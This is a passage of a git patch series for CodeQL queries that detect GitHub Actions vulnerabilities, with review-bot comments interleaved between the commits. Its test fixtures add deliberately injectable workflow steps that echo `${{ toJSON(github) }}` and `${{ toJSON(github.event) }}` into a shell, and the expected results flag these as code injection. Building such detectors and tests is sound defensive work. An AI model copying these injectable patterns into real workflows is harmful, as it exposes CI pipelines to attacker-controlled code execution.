b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -15,15 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // there are no evidences that the checked-out code can lead to arbitrary code execution not checkout.getAFollowingStep() instanceof PoisonableStep and ( + // label gates do not depend on the triggering event check instanceof LabelControlCheck or + // actor or Association gates apply to IssueOps only (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) 
From 47a66e10756f0d9ba4c9860b8c6e769c59baeed3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 21:43:00 +0200 Subject: [PATCH 0298/1267] Add TODO --- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5e4f078bc3a..0370b1ca4c3 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1290,6 +1290,8 @@ class MatrixAccessPathImpl extends TMatrixAccessPathNode { } private YamlMappingLikeNode resolveMatrixAccessPath( + // TODO: support `include` and `exclude` keys + // https://docs.github.com/en/actions/using-jobs/using-a-matrix-for-your-jobs#expanding-or-adding-matrix-configurations YamlMappingLikeNode root, MatrixAccessPathImpl accessPath ) { // access path contains no dots. eg: "os" From 5f8bab0608a9d2a3f460847e35cf2f45b920b868 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 17 May 2024 22:36:26 +0200 Subject: [PATCH 0299/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 7413744d3ff..b1a100a7040 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.25 +version: 0.0.26 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6bb27759f06..341b6f45c29 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.25 +version: 0.0.26 groups: - actions - queries From d3bff87f9accf334041cb821c21ad4a60fd29288 Mon Sep 17 00:00:00 2001 
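Review bot: The TODO added in `resolveMatrixAccessPath` sits between the opening parenthesis and the first parameter, where it reads as a remark about `root` rather than about the predicate. I would move it above the signature and state the consequence, e.g. `// TODO: support include and exclude keys; matrix values defined only through them are not resolved yet`. Until that is implemented, flows through `matrix.*` expressions whose values come only from `include` are presumably missed, which is worth knowing when reading query results. The predicate body continues outside the hunk.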
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 17 May 2024 23:10:29 +0200 Subject: [PATCH 0300/1267] Add github to json contexts --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 4 ++-- .../Security/CWE-094/.github/workflows/test4.yml | 8 ++++++++ .../query-tests/Security/CWE-094/CodeInjection.expected | 2 ++ .../Security/CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 4 files changed, 16 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 063a3f671a3..d9f7b14edd3 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -178,7 +178,7 @@ private predicate jsonEvent(string context) { reg = [ // json - "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", + "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", "github\\.event\\.inputs", "github\\.event\\.issue", "github\\.event\\.merge_group", @@ -262,7 +262,7 @@ class GitHubEventJsonSource extends RemoteFlowSource { ) or contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and - Utils::normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") + Utils::normalizeExpr(context).regexpMatch(".*\\bgithub(\\.event)?\\b.*") ) ) and flag = "json" diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml index c4380bfa8af..75bf0527ee8 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml 
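Review bot: In the second FlowSources.qll hunk, the new pattern `.*\\bgithub(\\.event)?\\b.*` has a redundant `(\\.event)?` group, because `\\bgithub\\b` already matches inside `github.event`; the effective test is "the normalized expression contains the word `github`". Together with the `contextTriggerDataModel(..., _)` conjunct, this appears to treat any `github.*` expression as a JSON source for the listed triggers, including fields an external user does not control, unless a conjunct outside the hunk narrows it. If that breadth is intended, writing it as `regexpMatch(".*\\bgithub\\b.*")` makes it explicit. If only the whole `github` object and `github.event` are meant, a negative fixture step such as `run: echo '${{ toJSON(github.run_id) }}'` next to the new `toJSON(github)` cases would pin the boundary. The enclosing class starts and ends outside the hunk.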
@@ -17,3 +17,11 @@ jobs: - name: Dump GitHub issue context id: github_issue_step run: echo '${{ toJSON(github.event.issue) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github.event) }}' diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index dc653a074e9..e47c6dd340c 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | +| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index ab0a69a8fa8..848e08cf69e 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
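Review bot: Both steps added to test4.yml reuse `id: github_issue_step` and the name `Dump GitHub issue context` from the existing step above them, so the job now has three steps with the same id. GitHub Actions expects step ids to be unique within a job, and distinct ids also make the individual cases easier to tell apart when reading the fixture against the `.expected` rows. I would use `id: github_context_step` for the `toJSON(github)` step and `id: github_event_step` for the `toJSON(github.event)` step, with matching `name:` values.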
@@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | +| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -340,6 +342,8 @@ subpaths | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | +| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | ${{ toJSON(github) }} | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | From 313acfcac20a34cee1c078c7534e564e6ac3da71 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 17 May 2024 12:28:06 +0200 Subject: [PATCH 0301/1267] Add externally triggereable data model and predicates --- ql/lib/codeql/actions/Ast.qll | 2 ++ ql/lib/codeql/actions/ast/internal/Ast.qll | 5 +++++ ql/lib/codeql/actions/dataflow/ExternalFlow.qll | 9 +++++++++ .../internal/ExternalFlowExtensions.qll | 7 ++++++- ql/lib/ext/workflow-models/workflow-models.yml | 17 ++++++++++++++++- 5 files changed, 38 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 1e57c8f3d29..cab2fc05ac5 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -348,6 +348,8 @@ abstract class Job extends AstNode instanceof JobImpl { predicate isPrivileged() { super.isPrivileged() } + predicate isExternallyTriggerable() { super.isExternallyTriggerable() } + string getARunsOnLabel() { result = super.getARunsOnLabel() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0370b1ca4c3..46bbcaaf29e 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -703,6 +703,11 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } + /** Holds if the job can be triggered by an external actor. */ + predicate isExternallyTriggerable() { + externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) + } + /** Holds if the job is privileged. */ predicate isPrivileged() { // the job has privileged runtime permissions diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index a52cc427d35..c46a3ee64a1 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
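Review bot: `isExternallyTriggerable()` in `JobImpl` decides on the trigger event name alone, and its QLDoc ("Holds if the job can be triggered by an external actor") does not say so. The model added later in this commit lists `workflow_run` and `workflow_call` with the remarks "depending on trigger workflow" and "depending on caller", so the predicate over-approximates for those events, and activity `types` or branch filters are not consulted either. I would spell that out, e.g. `/** Holds if any trigger event of this job is modelled as externally triggerable; only the event name is considered, so this over-approximates for workflow_run and workflow_call. */`. The public wrapper added to `Job` in Ast.qll has no QLDoc and should get the same one.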
@@ -38,6 +38,15 @@ predicate contextTriggerDataModel(string trigger, string context_prefix) { Extensions::contextTriggerDataModel(trigger, context_prefix) } +/** + * MaD models for externally triggerable events + * Fields: + * - event: Event name + */ +predicate externallyTriggerableEventsDataModel(string event) { + Extensions::externallyTriggerableEventsDataModel(event) +} + /** * MaD sources * Fields: diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 415c02dc1ba..6c64b72e6b4 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -36,6 +36,11 @@ extensible predicate workflowDataModel( extensible predicate repositoryDataModel(string visibility, string default_branch_name); /** - * Holds if context/trigger mapping exists for the given parameters. + * Holds if a context expression starting with context_prefix is available for a given trigger. */ extensible predicate contextTriggerDataModel(string trigger, string context_prefix); + +/** + * Holds if a given trigger event can be fired by an external actor. + */ +extensible predicate externallyTriggerableEventsDataModel(string event); diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index 404e894a5f8..ff02589fb84 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -11,7 +11,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: contextTriggerDataModel data: - # This predicate maps triggering events with the github event context available for that event - ["commit_comment", "github.event.comment"] - ["discussion", "github.event.discussion"] - ["discussion_comment", "github.event.comment"] 
@@ -55,3 +54,19 @@ extensions: - ["workflow_call", "github.event.review"] - ["workflow_call", "github.event.workflow"] - ["workflow_call", "github.event.workflow_run"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: externallyTriggerableEventsDataModel + data: + - ["discussion"] + - ["discussion_comment"] + - ["fork"] + - ["issue_comment"] + - ["issues"] + - ["pull_request"] + - ["pull_request_comment"] + - ["pull_request_review"] + - ["pull_request_review_comment"] + - ["pull_request_target"] + - ["workflow_run"] # depending on trigger workflow + - ["workflow_call"] # depending on caller From 5d32071adcacbfeb2ce7b1c1f264f34266ec9f55 Mon Sep 17 00:00:00 2001 
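Review bot: `workflow_run` and `workflow_call` are listed unconditionally in `externallyTriggerableEventsDataModel`, although their inline comments say the answer depends on the trigger workflow or the caller. `JobImpl.isExternallyTriggerable()`, added earlier in this commit, will therefore hold for every job that uses them. The opposite risk is an omitted event: `commit_comment` appears in `contextTriggerDataModel` above but not in this list, and if outside users can raise it, a job triggered only by it would be treated as not externally triggerable. I would check the list against GitHub's documented workflow triggers and record the over-approximation next to the two entries, e.g. `# over-approximation: listed unconditionally, the caller / trigger workflow is not checked`.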
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 21 May 2024 23:02:34 +0200 Subject: [PATCH 0302/1267] resolve conflicts --- ql/lib/codeql/actions/Ast.qll | 164 +------------- ql/lib/codeql/actions/Helper.qll | 209 ++++++++++++++++++ ql/lib/codeql/actions/ast/internal/Ast.qll | 134 +++++++---- .../actions/controlflow/internal/Cfg.qll | 25 ++- .../codeql/actions/dataflow/FlowSources.qll | 54 ++--- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 14 +- .../dataflow/internal/DataFlowPrivate.qll | 19 +- .../dataflow/internal/DataFlowPublic.qll | 3 +- .../security/EnvPathInjectionQuery.qll | 4 +- .../actions/security/EnvVarInjectionQuery.qll | 4 +- .../actions/security/PoisonableSteps.qll | 2 +- .../security/UntrustedCheckoutQuery.qll | 12 +- ql/src/Debug/partial.ql | 2 +- ...jection.ql => EnvPathInjectionCritical.ql} | 15 +- ...Injection.ql => EnvPathInjectionMedium.ql} | 11 +- ...njection.ql => EnvVarInjectionCritical.ql} | 13 +- ...rInjection.ql => EnvVarInjectionMedium.ql} | 11 +- ...jection.ql => CommandInjectionCritical.ql} | 17 +- ...Injection.ql => CommandInjectionMedium.ql} | 10 +- ...eInjection.ql => CodeInjectionCritical.ql} | 15 +- ...odeInjection.ql => CodeInjectionMedium.ql} | 12 +- ql/src/Security/CWE-349/CachePoisoning.ql | 12 +- .../CWE-349/CachePoisoningByCodeInjection.ql | 4 +- .../UntrustedCheckoutTOCTOUCritical.ql | 4 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 + ...soning.ql => ArtifactPoisoningCritical.ql} | 15 +- ...oisoning.ql => ArtifactPoisoningMedium.ql} | 10 +- ...itical.ql => UntrustedCheckoutCritical.ql} | 10 +- ...eckoutHigh.ql => UntrustedCheckoutHigh.ql} | 8 +- .../CWE-829/UntrustedCheckoutMedium.ql | 31 +++ ql/test/library-tests/test.ql | 8 +- .../Security/CWE-077/EnvPathInjection.qlref | 1 - ...cted => EnvPathInjectionCritical.expected} | 10 +- .../CWE-077/EnvPathInjectionCritical.qlref | 1 + ...pected => EnvPathInjectionMedium.expected} | 0 .../CWE-077/EnvPathInjectionMedium.qlref | 1 + .../Security/CWE-077/EnvVarInjection.qlref 
| 1 - ...ected => EnvVarInjectionCritical.expected} | 22 +- .../CWE-077/EnvVarInjectionCritical.qlref | 1 + ...xpected => EnvVarInjectionMedium.expected} | 0 .../CWE-077/EnvVarInjectionMedium.qlref | 1 + .../CWE-077/PrivilegedEnvPathInjection.qlref | 1 - .../CWE-077/PrivilegedEnvVarInjection.qlref | 1 - .../Security/CWE-078/CommandInjection.qlref | 1 - ...cted => CommandInjectionCritical.expected} | 4 +- .../CWE-078/CommandInjectionCritical.qlref | 1 + ...pected => CommandInjectionMedium.expected} | 0 .../CWE-078/CommandInjectionMedium.qlref | 1 + .../CWE-078/PrivilegedCommandInjection.qlref | 1 - .../.github/actions/action1/action.yml | 7 + .../{ => .github/actions}/action2/action.yml | 0 .../.github/actions/action3/action.yml | 9 + .../.github/actions/action4/action.yml | 7 + .../.github/actions/action5/action.yml | 26 +++ .../.github/workflows/changelog_required.yml | 9 - .../workflows/changelog_required_prt.yml | 9 - .../workflows/composite-action-caller-1.yml | 10 + .../workflows/composite-action-caller-2.yml | 10 + .../workflows/composite-action-caller-3.yml | 14 ++ ...{changelog.yml => reusable-workflow-1.yml} | 17 +- ...g_from_prt.yml => reusable-workflow-2.yml} | 17 +- .../workflows/reusable-workflow-caller-1.yml | 11 + .../workflows/reusable-workflow-caller-2.yml | 10 + .../Security/CWE-094/CodeInjection.qlref | 1 - ...xpected => CodeInjectionCritical.expected} | 191 ++++++++-------- .../CWE-094/CodeInjectionCritical.qlref | 1 + ....expected => CodeInjectionMedium.expected} | 43 +++- .../CWE-094/CodeInjectionMedium.qlref | 1 + .../CWE-094/PrivilegedCodeInjection.qlref | 1 - .../CWE-367/.github/workflows/actor.yml | 21 ++ .../Security/CWE-829/ArtifactPoisoning.qlref | 2 - ...ted => ArtifactPoisoningCritical.expected} | 26 +-- .../CWE-829/ArtifactPoisoningCritical.qlref | 2 + ...ected => ArtifactPoisoningMedium.expected} | 0 .../CWE-829/ArtifactPoisoningMedium.qlref | 2 + .../CWE-829/PrivilegedArtifactPoisoning.qlref | 2 - 
.../PrivilegedUntrustedCheckoutCritical.qlref | 1 - .../PrivilegedUntrustedCheckoutHigh.qlref | 1 - ...ted => UntrustedCheckoutCritical.expected} | 0 .../CWE-829/UntrustedCheckoutCritical.qlref | 1 + ...xpected => UntrustedCheckoutHigh.expected} | 0 .../CWE-829/UntrustedCheckoutHigh.qlref | 1 + .../CWE-829/UntrustedCheckoutMedium.expected | 0 .../CWE-829/UntrustedCheckoutMedium.qlref | 1 + 84 files changed, 812 insertions(+), 544 deletions(-) create mode 100644 ql/lib/codeql/actions/Helper.qll rename ql/src/Security/CWE-077/{PrivilegedEnvPathInjection.ql => EnvPathInjectionCritical.ql} (74%) rename ql/src/Security/CWE-077/{EnvPathInjection.ql => EnvPathInjectionMedium.ql} (78%) rename ql/src/Security/CWE-077/{PrivilegedEnvVarInjection.ql => EnvVarInjectionCritical.ql} (77%) rename ql/src/Security/CWE-077/{EnvVarInjection.ql => EnvVarInjectionMedium.ql} (80%) rename ql/src/Security/CWE-078/{PrivilegedCommandInjection.ql => CommandInjectionCritical.ql} (59%) rename ql/src/Security/CWE-078/{CommandInjection.ql => CommandInjectionMedium.ql} (79%) rename ql/src/Security/CWE-094/{PrivilegedCodeInjection.ql => CodeInjectionCritical.ql} (68%) rename ql/src/Security/CWE-094/{CodeInjection.ql => CodeInjectionMedium.ql} (77%) rename ql/src/Security/CWE-829/{PrivilegedArtifactPoisoning.ql => ArtifactPoisoningCritical.ql} (64%) rename ql/src/Security/CWE-829/{ArtifactPoisoning.ql => ArtifactPoisoningMedium.ql} (77%) rename ql/src/Security/CWE-829/{PrivilegedUntrustedCheckoutCritical.ql => UntrustedCheckoutCritical.ql} (85%) rename ql/src/Security/CWE-829/{PrivilegedUntrustedCheckoutHigh.ql => UntrustedCheckoutHigh.ql} (87%) create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql delete mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref rename ql/test/query-tests/Security/CWE-077/{PrivilegedEnvPathInjection.expected => EnvPathInjectionCritical.expected} (71%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref 
rename ql/test/query-tests/Security/CWE-077/{EnvPathInjection.expected => EnvPathInjectionMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref rename ql/test/query-tests/Security/CWE-077/{PrivilegedEnvVarInjection.expected => EnvVarInjectionCritical.expected} (71%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref rename ql/test/query-tests/Security/CWE-077/{EnvVarInjection.expected => EnvVarInjectionMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjection.qlref rename ql/test/query-tests/Security/CWE-078/{PrivilegedCommandInjection.expected => CommandInjectionCritical.expected} (61%) create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref rename ql/test/query-tests/Security/CWE-078/{CommandInjection.expected => CommandInjectionMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml rename ql/test/query-tests/Security/CWE-094/{ => .github/actions}/action2/action.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml delete mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml delete 
mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml rename ql/test/query-tests/Security/CWE-094/.github/workflows/{changelog.yml => reusable-workflow-1.yml} (90%) rename ql/test/query-tests/Security/CWE-094/.github/workflows/{changelog_from_prt.yml => reusable-workflow-2.yml} (90%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml delete mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjection.qlref rename ql/test/query-tests/Security/CWE-094/{PrivilegedCodeInjection.expected => CodeInjectionCritical.expected} (65%) create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref rename ql/test/query-tests/Security/CWE-094/{CodeInjection.expected => CodeInjectionMedium.expected} (74%) create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml delete mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref rename ql/test/query-tests/Security/CWE-829/{PrivilegedArtifactPoisoning.expected => ArtifactPoisoningCritical.expected} (73%) create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref rename ql/test/query-tests/Security/CWE-829/{ArtifactPoisoning.expected => ArtifactPoisoningMedium.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref delete mode 
100644 ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.qlref delete mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.qlref rename ql/test/query-tests/Security/CWE-829/{PrivilegedUntrustedCheckoutCritical.expected => UntrustedCheckoutCritical.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref rename ql/test/query-tests/Security/CWE-829/{PrivilegedUntrustedCheckoutHigh.expected => UntrustedCheckoutHigh.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cab2fc05ac5..9be2580f36e 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -1,160 +1,6 @@ private import codeql.actions.ast.internal.Ast private import codeql.Locations - -module Utils { - bindingset[expr] - string normalizeExpr(string expr) { - result = - expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") - .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") - .regexpReplaceAll("\\s*\\.\\s*", ".") - } - - bindingset[regex] - string wrapRegexp(string regex) { - result = - [ - "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", - "toJSON\\(\\s*" + regex + "\\s*\\)" - ] - } - - bindingset[str] - private string trimQuotes(string str) { - result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") - } - - bindingset[line, var] - predicate extractLineAssignment(string line, string var, string key, string value) { - exists(string assignment | - // single line assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + - var.toUpperCase() + "(\\})?(\"|')?", 2) and - count(assignment.splitAt("=")) = 2 and - key = trimQuotes(assignment.splitAt("=", 